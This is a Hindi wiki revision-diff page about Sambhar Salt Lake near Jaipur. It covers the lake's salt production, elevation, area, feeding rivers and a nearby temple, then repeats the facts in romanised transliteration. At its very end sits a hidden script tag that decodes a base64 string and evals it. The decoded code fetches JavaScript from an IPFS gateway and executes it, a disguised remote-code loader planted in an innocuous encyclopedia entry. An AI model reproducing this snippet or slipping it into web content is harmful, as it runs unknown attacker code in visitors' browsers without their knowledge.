Difference between revisions of "सांभर झील जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " भारत " to " भारत ")
Line 1: Line 1:
 +
[[चित्र:Gadwall-In-Sambhar-Salt-Lake.jpg|thumb|250px|सांभर झील में गडवाल, [[जयपुर]]<br />Gadwall In Sambhar Lake, Jaipur]]
 
*[[भारत]] के [[राजस्थान]] राज्य में [[जयपुर]] नगर के समीप स्थित यह [[लवण (रसायन विज्ञान)|लवण]] [[जल]] (खारे पानी) की झील है।  
 
*[[भारत]] के [[राजस्थान]] राज्य में [[जयपुर]] नगर के समीप स्थित यह [[लवण (रसायन विज्ञान)|लवण]] [[जल]] (खारे पानी) की झील है।  
 
*देश की सबसे बडी खारे पानी की झील सांभर नमक के सबसे बडे स्‍त्रोत होने के साथ ही पर्यटन की दृष्टि से भी अत्‍यन्‍त आकर्षक स्‍थल है।  
 
*देश की सबसे बडी खारे पानी की झील सांभर नमक के सबसे बडे स्‍त्रोत होने के साथ ही पर्यटन की दृष्टि से भी अत्‍यन्‍त आकर्षक स्‍थल है।  
Line 10: Line 11:
 
*गाद में स्थित विलयशील सोडियम यौगिक वर्षा के जल में घुसकर नदियों द्वारा झील में पहुँचाता है और जल के वाष्पन के पश्चात् झील में नमक के रूप में रह जाता है।
 
*गाद में स्थित विलयशील सोडियम यौगिक वर्षा के जल में घुसकर नदियों द्वारा झील में पहुँचाता है और जल के वाष्पन के पश्चात् झील में नमक के रूप में रह जाता है।
  
{| width="100%"
+
{{लेख प्रगति
|-
+
|आधार=
|
+
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=  
 +
|पूर्णता=
 +
|शोध=
 +
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
|-
 
|
 
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
|}
+
 
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:जयपुर के पर्यटन स्थल]]

Revision as of 07:36, 3 October 2010

[[chitr:Gadwall-In-Sambhar-Salt-Lake.jpg|thumb|250px|saanbhar jhil mean gadaval, jayapur
Gadwall In Sambhar Lake, Jaipur]]

  • bharat ke rajasthan rajy mean jayapur nagar ke samip sthit yah lavan jal (khare pani) ki jhil hai.
  • desh ki sabase badi khare pani ki jhil saanbhar namak ke sabase bade sh‍trot hone ke sath hi paryatan ki drishti se bhi ath‍yanh‍t akarshak sh‍thal hai.
  • uth‍tari bharat ke chauhan rajaoan ki pratham rajadhani saanbhar pauranik drishti se bhi mahath‍vapoorn hai.
  • yahaan par shakanmh‍bhari mata ka mandir hai.
  • yah jhil samudr tal se 1,200 phut ki ooanchaee par sthit hai.
  • jab yah bhari rahati hai tab isaka kshetraphal 90 varg mil rahata hai.
  • isamean tin nadiyaan akar girati haian.
  • is jhil se b de paimane par namak ka utpadan kiya jata hai.
  • anuman hai ki aravali ke shisht aur nais ke gartoan mean bhara hua gad hi namak ka srot hai.
  • gad mean sthit vilayashil sodiyam yaugik varsha ke jal mean ghusakar nadiyoan dvara jhil mean pahuanchata hai aur jal ke vashpan ke pashchath jhil mean namak ke roop mean rah jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>